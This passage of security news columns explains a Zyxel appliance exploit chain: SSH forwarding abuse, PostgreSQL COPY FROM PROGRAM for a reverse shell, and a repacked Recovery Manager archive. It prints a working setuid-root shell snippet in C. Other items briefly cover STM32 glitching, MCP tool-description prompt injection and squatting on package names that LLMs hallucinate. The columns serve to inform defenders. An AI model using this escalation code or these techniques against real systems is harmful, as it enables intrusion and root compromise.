-false: unknown program '-false'
Try '-false --help' for more information.
Connection to 192.168.169.1 closed.

It’s slightly janky, but seems set up correctly, right? There’s one more step to do this completely: add a Match entry to sshd_config, and disable some of the other SSH features you may not have thought about, like X11 forwarding and TCP forwarding. This is the part that Zyxel forgot. VPN-only users can successfully connect over SSH, and the connection terminates right away thanks to the invalid shell, but in that brief moment, TCP traffic forwarding is enabled. This is an unintended security domain traversal, as it allows the SSH user to redirect traffic to internal-only ports.
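
The missing hardening looks something like this in sshd_config. The option names are stock OpenSSH; the Match criteria here are hypothetical, since exactly how the appliance provisions VPN users isn't public:

Match User vpn-user
    AllowTcpForwarding no
    X11Forwarding no
    PermitTunnel no
    PermitTTY no

Newer OpenSSH releases also offer DisableForwarding yes, a single directive that turns off TCP, X11, and agent forwarding in one line.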

The next question to ask: is there any service running inside the appliance that provides a pivot point? How about PostgreSQL? This service is set up to allow local connections on port 5432, without a password. And PostgreSQL has a wonderful feature in COPY FROM PROGRAM, which lets a COPY command specify a program to run using the system shell. It’s essentially arbitrary shell execution as a feature, but limited to the PostgreSQL user. It’s easy enough to launch a reverse shell for ongoing access, but still limited to the PostgreSQL user account.

There are a couple of directions exploitation can go from there. The /tmp/webcgi.log file is accessible, which allows grabbing an access token from a logged-in admin. But there’s an even better approach: the unprivileged user can use the system’s Recovery Manager to download system settings, repack the resulting zip with a custom binary, re-upload the zip using Recovery Manager, and then interact with the uploaded files. The clever trick is to compile a custom binary that calls setuid(0). Because Recovery Manager writes it out as root with the setuid bit set, any user can execute it and jump straight to root. Impressive.
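
That root-jump binary is only a few lines of C. A minimal sketch of the classic pattern, which works under the write-up's assumption that Recovery Manager restores the file owned by root with the setuid bit set:

#include <unistd.h>

int main(void) {
    /* The setuid bit gives this process euid 0; setuid(0) then makes
     * the real uid 0 as well, so the spawned shell doesn't drop
     * privileges. */
    setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;   /* only reached if execl() fails */
}

The whole chain works because the archive contents are written back out as root without validating what's inside, turning a settings-restore feature into a privilege escalation primitive.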

Power Glitching an STM32

Microcontrollers have a weird set of conflicting requirements. They need to be easily flashed and easily debugged for development work. But once deployed, those same chips often need to be hardened against reading flash and memory contents. Chips like the STM32 series from ST Microelectronics have multiple settings to keep chip contents secure. And Anvil Secure has some research on how some of those protections can be defeated: power glitching.

The basic explanation is that these chips are only guaranteed to work inside their specified operating conditions. If the supply voltage is too low, be prepared for unforeseen consequences. Anvil tried this, and memory reads were indeed garbled. This is promising, as the memory protection settings are read from system memory during the boot process. In fact, one of the hardest challenges of this hack was determining the exact timing needed to glitch the right memory read. Once that was nailed down, it took about six hours of attempts and troubleshooting to actually put the embedded system into a state where the firmware could be extracted.

MCP Line Jumping

Trail of Bits is starting a series on MCP security. This has echoes of the latest FLOSS Weekly episode, talking about agentic AI and how Model Context Protocol (MCP) is giving LLMs access to tools to interact with the outside world. The security issue covered in this first entry is Line Jumping, also known as tool poisoning.

It all boils down to the fact that MCP servers advertise the tools they make available. When an LLM client connects to a server, it ingests those tool descriptions to know how to use them. Each description is an opportunity for prompt injection, one of the outstanding unsolved problems with LLMs.

Bits and Bytes

South Korea’s SK Telecom has been hacked, though not much information is available yet. One of the notable statements is that SK Telecom is offering customers a free SIM swapping protection service, which implies the capture of a customer database that could be used for SIM swapping attacks.

WatchTowr is back with a simple pre-auth RCE in Commvault using a malicious zip upload. It’s a familiar story, where an unauthenticated endpoint can trigger a file download from a remote server, and file traversal bugs allow unzipping it in an arbitrary location. Easy win.

SSD Disclosure has discovered a pair of Use After Free bugs in Google Chrome, and Chrome’s MiraclePtr prevents them from becoming actual exploits. That technology combines object reference counting with “quarantining” of deleted objects that still have active references. And for these particular bugs, it worked to prevent exploitation.

And finally, [Rohan] believes there’s an argument to be made that the simplicity of ChaCha20 makes it a better choice as a symmetric encryption primitive than the venerable AES. Both are very well understood and vetted encryption standards, and ChaCha20 even manages better performance and efficiency. Is it time to hang up AES and embrace ChaCha20?

This Week in Security: No More CVEs, 4chan, and Recall Returns

The sky is falling. Or more specifically, it was about to fall, according to the security community this week. The MITRE Corporation came within a hair’s breadth of its contract to maintain the CVE database expiring. And admittedly, it would be a bad thing if we suddenly lost updates to the central CVE database. What’s particularly interesting is how we knew about this possibility at all. An April 15 letter sent to the CVE board warned that the specific contract that funds MITRE’s CVE and CWE work was due to expire on the 16th. This was not an official release, and it’s not clear exactly how the document leaked.

Many people made political hay out of the apparent imminent carnage. And while there’s always an element of political maneuvering when it comes to contract renewal, it’s worth noting that it’s not unheard of for MITRE’s CVE funding to go down to the wire like this. We don’t know how many times we’ve been in this position in years past. Regardless, MITRE has spun out another non-profit, The CVE Foundation, specifically to see to the continuation of the CVE database. And at the last possible moment, CISA has announced that it has invoked an option in the existing contract, funding MITRE’s CVE work for another 11 months.

Android Automatic Reboots

Mobile devices are in their most secure state right after boot, before the user password is entered to unlock the device for the first time. Tools like Cellebrite can often break into a device that has been unlocked at least once, but just can’t exploit a device in the freshly booted state. This is why Google is rolling out a feature where Android devices that haven’t been unlocked for three days will automatically reboot.

Once a phone is unlocked, the encryption keys are stored in memory, and it only takes a lock screen bypass to have full access to the device. But before the initial unlock, the device is still encrypted, and the keys are safely stored in the hardware security module. It’s interesting that this new feature isn’t delivered as an Android OS update, but as part of the Google Play Services — the closed source libraries that run on official Android phones.

4chan

4chan has been hacked. It turns out that running ancient PHP code and out-of-date libraries on a controversial site is not a great idea. A likely exploit chain has been described, though it should be considered very unofficial at this point: some 4chan boards allow PDF uploads, but the server didn’t properly vet those files. A PostScript file can be uploaded instead of a PDF, and an old version of Ghostscript processes it. The malicious PostScript file triggers arbitrary code execution in Ghostscript, and a SUID binary is used to elevate privileges to root.

PHP source code of the site has been leaked, and the site is still down as of the time of writing. It’s unclear how long restoration will take. Part of the fallout from this attack is the capture and release of internal discussions, pictures of the administrative tools, and even email addresses from the site’s administration.

Recall is Back

Microsoft is back at it, working to release Recall in a future Windows 11 update. You may remember our coverage of this, castigating the security failings, and pointing out that Recall managed to come across as creepy. Microsoft wisely pulled the project before rolling it out as a full release.

If you’re not familiar with the Recall concept, it’s the automated screenshotting of your Windows machine every few seconds. The screenshots are then locally indexed with an LLM, allowing for future queries to be run against the data. And once the early reviewers got over the creepy factor, it turns out that’s genuinely useful sometimes.

On top of the security hardening Microsoft has already done, this iteration of Recall is an opt-in service, with an easy pause button to temporarily disable the snapshot captures. This is definitely an improvement. Critics are still sounding the alarm, but for a much narrower problem: Recall’s snapshots will automatically extract information from security-focused applications. Think about Signal’s disappearing messages feature. If you send such a message to a desktop user who has Recall enabled, the message is likely stored in that user’s Recall database.

It seems that Microsoft has done a reasonably good job of cleaning up the Recall feature, particularly by disabling it by default. The privacy issues could be further addressed by giving applications and even web pages a way to opt out of Recall captures, so private messages and data aren’t accidentally captured. As Recall rolls out, do keep in mind the potential extra risks.

16,000 Symlinks

It’s been recently discovered that over 16,000 Fortinet devices are compromised with a trivial backdoor, in the form of a symlink making the root filesystem available inside the web-accessible language folder. This technique is limited to devices that have the SSL VPN enabled. That system exposes a web interface, with multiple translation options. Those translation files live in a world-accessible folder on the web interface, and it makes for the perfect place to hide a backdoor like this one. It’s not a new attack, and Fortinet believes the exploited devices have harbored this backdoor since the 2023-2024 hacking spree.

Vibes

We’re a little skeptical of the whole vibe coding thing. Our own [Tyler August] covered one of the reasons why. LLMs are likely to hallucinate package names, and vibe coders may not check closely, leading to easy typosquatting (LLMsquatting?) attacks. Figure out the likely hallucinated names, register those packages, and profit.

But what about Vibe Detections? OK, we know, letting an LLM look at system logs for potentially malicious behavior isn’t a new idea. But [Claudio Contin] demonstrates just how easy it can be, with the new EDV tool. Formally not for production use, this new gadget makes it easy to take Windows system events and feed them into Copilot, looking for potentially malicious activity. And while it’s not perfect, it did manage to detect about 40% of the malicious tests that Windows Defender missed. It seems like LLMs are going to stick around, and this might be one of the places they actually make sense.

Bits and Bytes

Apple has pushed updates to their entire line, fixing a pair of 0-day vulnerabilities. The first is a wild vulnerability in CoreAudio, where simply playing a malicious audio file can lead to arbitrary code execution. The chaser is a flaw in the Pointer Authentication scheme that Apple uses to mitigate memory-related vulnerabilities. Apple has acknowledged that these flaws were used in the wild, but no further details have been released.

The Gnome desktop has an interesting problem, where the yelp help browser can be tricked into reading the contents of arbitrary filesystem files. Combined with the possibility of browser links automatically opening in yelp, this makes for a much more severe problem than one might initially think.

And for those of us following along with Google Project Zero’s deep dive into the Windows Registry, part six of that series is now available. This installment dives into actual memory structures, as well as letting us in on the history of why the Windows registry is called the hive and uses the 0xBEE0BEE0 signature. It’s bee-themed because one developer hated bees, and another developer thought it would be hilarious.
